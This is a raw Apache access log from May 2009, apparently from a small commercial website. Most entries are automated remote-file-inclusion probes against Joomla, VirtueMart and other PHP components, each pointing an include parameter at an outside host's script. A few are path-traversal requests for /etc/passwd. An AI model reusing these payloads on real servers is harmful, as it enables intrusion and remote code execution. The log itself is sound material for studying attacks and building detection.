124.0.54.98 - - [08/May/2009:03:21:23 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.6.8.112 - - [08/May/2009:03:21:27 -0400] "GET /logs/access_log.Q108042400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.140.23.192 - - [08/May/2009:03:21:32 -0400] "GET /logs/access_log.Q109042500///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.140.23.192 - - [08/May/2009:03:21:40 -0400] "GET /logs/access_log.Q109042500///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
87.106.253.45 - - [08/May/2009:03:21:43 -0400] "GET ///include/bbs.lib.inc.php?site_path=../../../../../../../../etc/passwd HTTP/1.0" 404 223 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
87.106.253.45 - - [08/May/2009:03:21:43 -0400] "GET /logs///include/bbs.lib.inc.php?site_path=../../../../../../../../etc/passwd HTTP/1.0" 404 228 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
87.106.253.45 - - [08/May/2009:03:21:43 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.rabika.ru/hk? HTTP/1.0" 404 222 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
87.106.253.45 - - [08/May/2009:03:21:43 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.rabika.ru/hk? HTTP/1.0" 404 227 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
121.254.231.239 - - [08/May/2009:03:21:51 -0400] "GET /logs/access_log.Q109020700%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:03:21:51 -0400] "GET /logs/access_log.Q108102400%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:22:00 -0400] "GET /logs/access_log.Q109042600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
213.239.241.77 - - [08/May/2009:03:22:18 -0400] "GET /logs/phphtml.php?htmlclass_path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
213.239.241.77 - - [08/May/2009:03:22:19 -0400] "GET /logs/access_log.Q108092600/phphtml.php?htmlclass_path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
213.239.241.77 - - [08/May/2009:03:22:19 -0400] "GET /phphtml.php?htmlclass_path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
213.239.241.77 - - [08/May/2009:03:22:20 -0400] "GET /logs/access_log.Q108090100/phphtml.php?htmlclass_path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:22:33 -0400] "GET /logs/access_log.Q108060800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
91.195.124.10 - - [08/May/2009:03:22:45 -0400] "GET /errors.php?error=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.195.124.10 - - [08/May/2009:03:22:45 -0400] "GET /logs/errors.php?error=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.195.124.10 - - [08/May/2009:03:22:45 -0400] "GET /logs/access_log.Q108082700/errors.php?error=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
59.109.75.86 - - [08/May/2009:03:22:46 -0400] "GET /logs/access_log.Q108110100/announcements.php?phpraid_dir=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.0" 404 242 "-" "Mozilla/5.0"
91.195.124.10 - - [08/May/2009:03:22:47 -0400] "GET /logs/access_log.Q108121400/errors.php?error=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
190.248.10.179 - - [08/May/2009:03:23:07 -0400] "GET /logs/error_log.Q108061700//admin/ST_platforms.php?include_path=http://www.boredfree.com/bistro/yes.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
190.248.10.179 - - [08/May/2009:03:23:07 -0400] "GET //admin/ST_platforms.php?include_path=http://www.boredfree.com/bistro/yes.txt???? HTTP/1.1" 404 221 "-" "libwww-perl/5.808"
190.248.10.179 - - [08/May/2009:03:23:07 -0400] "GET /logs//admin/ST_platforms.php?include_path=http://www.boredfree.com/bistro/yes.txt???? HTTP/1.1" 404 226 "-" "libwww-perl/5.808"
74.6.8.112 - - [08/May/2009:03:23:13 -0400] "GET /logs/error_log.Q108100900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
86.54.102.45 - - [08/May/2009:03:23:32 -0400] "GET /logs/access_log.Q108112400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:23:46 -0400] "GET /logs/access_log.Q109040400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:23:58 -0400] "GET /logs/access_log.Q109042600%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:24:42 -0400] "GET /logs/access_log.Q109040400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [08/May/2009:03:25:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.8.112 - - [08/May/2009:03:25:40 -0400] "GET /logs/error_log.Q107082900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
84.54.137.9 - - [08/May/2009:03:26:23 -0400] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
84.54.137.9 - - [08/May/2009:03:26:23 -0400] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
84.54.137.9 - - [08/May/2009:03:26:26 -0400] "GET /logs/access_log.Q108122800/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:03:26:31 -0400] "GET /logs/access_log.Q108102500/index.php?pag=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
213.239.241.77 - - [08/May/2009:03:27:10 -0400] "GET /logs/access_log.Q108102600%20%20/phphtml.php?htmlclass_path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
67.227.186.29 - - [08/May/2009:03:27:19 -0400] "GET //administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ivtm.hu/cache/c?? HTTP/1.1" 404 264 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
67.227.186.29 - - [08/May/2009:03:27:19 -0400] "GET /logs//administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ivtm.hu/cache/c?? HTTP/1.1" 404 269 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
67.227.186.29 - - [08/May/2009:03:27:19 -0400] "GET //administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ivtm.hu/cache/test.txt?? HTTP/1.1" 404 264 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
67.227.186.29 - - [08/May/2009:03:27:19 -0400] "GET /logs//administrators/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ivtm.hu/cache/test.txt?? HTTP/1.1" 404 269 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
86.54.102.45 - - [08/May/2009:03:27:19 -0400] "GET /logs/access_log.Q109042500///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
204.11.53.20 - - [08/May/2009:03:27:34 -0400] "GET /logs/access_log.Q108100500/net/index.php?dir=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 238 "-" "libwww-perl/5.811"
86.54.102.45 - - [08/May/2009:03:27:42 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:27:42 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:27:42 -0400] "GET /logs/access_log.Q108060800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:27:46 -0400] "GET /logs/access_log.Q109042200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
121.165.73.157 - - [08/May/2009:03:28:02 -0400] "GET /logs/access_log.Q108090300%20%20/img.php?loc=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
202.53.250.22 - - [08/May/2009:03:28:16 -0400] "GET /logs/access_log.Q108030100/convert/mvcw.php?vwar_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
202.53.250.22 - - [08/May/2009:03:28:23 -0400] "GET /convert/mvcw.php?vwar_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
121.165.73.157 - - [08/May/2009:03:28:24 -0400] "GET /logs/access_log.Q108090300%20%20/img.php?loc=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.195.124.10 - - [08/May/2009:03:28:29 -0400] "GET /logs/access_log.Q108082700%20%20/errors.php?error=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.195.124.10 - - [08/May/2009:03:28:29 -0400] "GET /logs/access_log.Q108121400%20%20/errors.php?error=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
202.53.250.22 - - [08/May/2009:03:28:29 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
84.54.137.9 - - [08/May/2009:03:28:46 -0400] "GET /logs/access_log.Q108122800%20%20/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:28:50 -0400] "GET /logs/access_log.Q109040400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:28:55 -0400] "GET /logs/access_log.Q108060800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:28:55 -0400] "GET /logs/access_log.Q109042200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
200.32.100.130 - - [08/May/2009:03:29:08 -0400] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.32.100.130 - - [08/May/2009:03:29:08 -0400] "GET /logs/access_log.Q108122800/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
200.32.100.130 - - [08/May/2009:03:29:08 -0400] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
202.53.250.22 - - [08/May/2009:03:29:23 -0400] "GET /logs/access_log.Q108021900/convert/mvcw.php?vwar_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
110.45.145.92 - - [08/May/2009:03:29:42 -0400] "GET /logs/access_log.Q108101100//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
110.45.145.92 - - [08/May/2009:03:29:42 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
110.45.145.92 - - [08/May/2009:03:29:42 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
110.45.145.92 - - [08/May/2009:03:29:43 -0400] "GET /logs/access_log.Q108091600//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
74.6.8.112 - - [08/May/2009:03:29:56 -0400] "GET /logs/access_log.Q107103000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.112 - - [08/May/2009:03:30:27 -0400] "GET /logs/access_log.Q108091600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.72.114 - - [08/May/2009:03:30:35 -0400] "GET /logs/error_log.Q108101900 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.150.240.52 - - [08/May/2009:03:30:35 -0400] "GET /logs//stats/modules/My_eGallery/index.php?basepath=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.150.240.52 - - [08/May/2009:03:30:35 -0400] "GET /logs/access_log.Q108100900//stats/modules/My_eGallery/index.php?basepath=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.150.240.52 - - [08/May/2009:03:30:35 -0400] "GET //stats/modules/My_eGallery/index.php?basepath=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.150.240.52 - - [08/May/2009:03:30:46 -0400] "GET /logs/access_log.Q108122800//stats/modules/My_eGallery/index.php?basepath=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
110.45.145.92 - - [08/May/2009:03:31:23 -0400] "GET /logs/access_log.Q108083100//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
210.118.194.225 - - [08/May/2009:03:31:37 -0400] "GET /logs/access_log.Q109031800//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.813"
210.118.194.225 - - [08/May/2009:03:31:38 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.813"
210.118.194.225 - - [08/May/2009:03:31:39 -0400] "GET /logs//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 485 "-" "libwww-perl/5.813"
221.157.225.65 - - [08/May/2009:03:31:47 -0400] "GET /?GLOBALS[binn_include_path]=http://datacore.fileave.com/id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
221.157.225.65 - - [08/May/2009:03:31:47 -0400] "GET /logs/access_log.Q109040200%20%20/?GLOBALS[binn_include_path]=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
221.157.225.65 - - [08/May/2009:03:31:47 -0400] "GET /logs/?GLOBALS[binn_include_path]=http://datacore.fileave.com/id.txt?? HTTP/1.1" 200 480 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:31:50 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:31:50 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.221.130.6 - - [08/May/2009:03:31:53 -0400] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
124.0.54.98 - - [08/May/2009:03:31:53 -0400] "GET /logs/access_log.Q108060800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:03:31:54 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:03:31:55 -0400] "GET /logs/access_log.Q108061000//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:03:31:55 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
221.157.225.65 - - [08/May/2009:03:31:57 -0400] "GET /logs/access_log.Q109040200/?GLOBALS[binn_include_path]=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:03:31:59 -0400] "GET /logs/access_log.Q108100700//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:32:03 -0400] "GET /logs/access_log.Q109042200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:03:32:04 -0400] "GET /logs/access_log.Q108082100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:03:32:04 -0400] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:03:32:04 -0400] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:03:32:04 -0400] "GET /logs/access_log.Q108122800/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
221.143.46.189 - - [08/May/2009:03:32:07 -0400] "GET //skin/zero_vote/login.php?dir=http://www.project80s.com/id.gif??? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
221.143.46.189 - - [08/May/2009:03:32:07 -0400] "GET /logs/access_log.Q108122300//skin/zero_vote/login.php?dir=http://www.project80s.com/id.gif??? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
221.143.46.189 - - [08/May/2009:03:32:07 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://www.project80s.com/id.gif??? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
110.45.146.146 - - [08/May/2009:03:32:19 -0400] "GET /logs/access_log.Q108081700/download.php?sub=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
117.192.97.82 - - [08/May/2009:03:32:28 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
117.192.97.82 - - [08/May/2009:03:32:28 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
117.192.97.82 - - [08/May/2009:03:32:34 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
117.192.97.82 - - [08/May/2009:03:32:34 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.249.72.114 - - [08/May/2009:03:32:44 -0400] "GET /images/items/EcOm/__MACOSX/ HTTP/1.1" 200 322 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [08/May/2009:03:32:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.143.46.189 - - [08/May/2009:03:32:49 -0400] "GET /logs/access_log.Q108122300//skin/zero_vote/login.php?dir=http://www.project80s.com/id.gif??? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
221.143.46.189 - - [08/May/2009:03:32:49 -0400] "GET //skin/zero_vote/login.php?dir=http://www.project80s.com/id.gif??? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
221.143.46.189 - - [08/May/2009:03:32:49 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://www.project80s.com/id.gif??? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
121.254.231.239 - - [08/May/2009:03:32:56 -0400] "GET /logs/access_log.Q108122200/index.php?x=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.111.184.103 - - [08/May/2009:03:33:08 -0400] "GET /logs/access_log.Q108121800//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.111.184.103 - - [08/May/2009:03:33:09 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
60.251.217.4 - - [08/May/2009:03:33:20 -0400] "GET /errors.php?error=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
60.251.217.4 - - [08/May/2009:03:33:25 -0400] "GET /logs/errors.php?error=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
89.111.184.103 - - [08/May/2009:03:33:52 -0400] "GET /logs/access_log.Q108121000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
200.32.100.130 - - [08/May/2009:03:34:00 -0400] "GET /logs/access_log.Q108122800%20%20/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
60.251.217.4 - - [08/May/2009:03:34:07 -0400] "GET /logs/access_log.Q108082700/errors.php?error=http://www.hetjongeschaap.nl/site/images/response.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
